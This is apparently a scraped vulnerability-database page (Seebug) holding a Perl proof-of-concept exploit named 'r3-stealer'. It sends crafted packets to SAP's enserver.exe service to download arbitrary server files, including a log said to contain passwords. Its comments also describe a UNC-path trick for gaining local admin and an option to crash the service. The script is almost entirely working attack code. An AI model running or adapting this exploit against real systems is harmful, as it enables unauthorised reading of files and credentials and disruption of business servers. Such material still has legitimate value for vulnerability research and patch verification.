#!/usr/bin/perl -w ## ## SAP \\\'enserver.exe\\\' file downloader ## Tested on \\\"SAP Web Application Server Java 6.40\\\" (eval DVD) ## Found & coded by Nicob ## ## The downloaded file is limited to the first 32 kilobytes ## Usual port : TCP/3200+SYSNR ## Exemple : ./r3-stealer-1.0.pl 192.168.2.22 3201 \\\"c:\\\\boot.ini\\\" ## ## From MSDN (Win2K pre-SP4, WinXP pre-SP2 and WinNT) : ## \\\"\\\\\\\\your_box\\\\pipe\\\\your_pipe\\\" => get Local Admin (SAPServiceJ2E) ## http://msdn.microsoft.com/library/default.asp?url=/library/en-us/secauthz/security/authorization_constants.asp ## ## File parameter : ## C:\boot.ini ## \\\\10.11.12.13shareimage.jpg ## ............Documents and SettingsAll UsersApplication Datasapdbwahttpreq.log (contains passwords !) ## # Init use strict; use IO::Socket; my $verbose = 0; # Set this to anything not null to crash the process my $crash = \\\"\\\"; my $socket; my $reply; $|=1; # Get arguments if (($#ARGV<2) or ($ARGV[0] eq \\\"-h\\\")) {die \\\"Usage: $0 <ip> <port> <remote filename> (<local filename>) \\\";} my $host=$ARGV[0]; my $port=$ARGV[1]; my $filename=$ARGV[2]; my $output=$ARGV[3]; # Calculate variables my $lg = length($filename); my $tag1 = sprintf(\\\'%x\\\', 0x4F + $lg); my $tag2 = sprintf(\\\'%x\\\', 0x20 + $lg); # Show banner print \\\"##################################################################### \\\"; print \\\"### SAP \\\'enserver.exe\\\' file downloader \\\"; print \\\"### Downloading \\\'$filename\\\' from \\\'$host\\\' \\\"; print \\\"##################################################################### \\\"; # Define the packets my $packet1 = \\\"0000005dabcde123000000000000005d0000005d06010000000000060000000000040000000000010004000000000003\\\". # Static \\\"5f6e69636f625f6e69636f625f6e69636f62315f\\\". # ASCII string : \\\"_nicob_nicob_nicob1_\\\" \\\"00000000020000003b0000000500000002000000060000000400000001\\\"; # Static my $packet2 = \\\"000000\\\". $tag1. \\\"abcde12300000001000000\\\". $tag1 .\\\"000000\\\". $tag1 . \\\"03000000454e430001010000234541410100000013030000000000234541450001000000\\\". $tag2 . \\\"0000000000007d00000000000000000000000000\\\". unpack(\\\"H*\\\",$filename) . $crash .\\\"000023454144\\\"; # Crash if bad filename length # Create the socket $socket = IO::Socket::INET->new(Proto=>\\\"tcp\\\",PeerAddr=>$host,PeerPort => $port) || die \\\"Connection refused at [$host:$port]\\\"; # Send the two packet print $socket pack(\\\"H*\\\",$packet1); print $socket pack(\\\"H*\\\",$packet2); sleep 2; # Read and display response recv($socket,$reply,150000,MSG_PEEK); if ($reply =~ /^(.*)#EAD(.*)$/s) { print \\\"File received ! \\\"; if ((!defined($output)) or ($output eq \\\"\\\")) { print \\\" =========================================== \\\"; print $2; print \\\" =========================================== \\\"; } else { open(OUT, \\\"> $output\\\") || die \\\"Can\\\'t open $output ($0)\\\"; print \\\"File saved as \\\'$output\\\' \\\"; print OUT $2; close(OUT); } } else { print \\\"Problem interpreting reply :-( \\\"; } # Close the socket print \\\" The end ... \\\"; close $socket;
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
匿名 兑换PoC
京公网安备 11010502034610号
暂无评论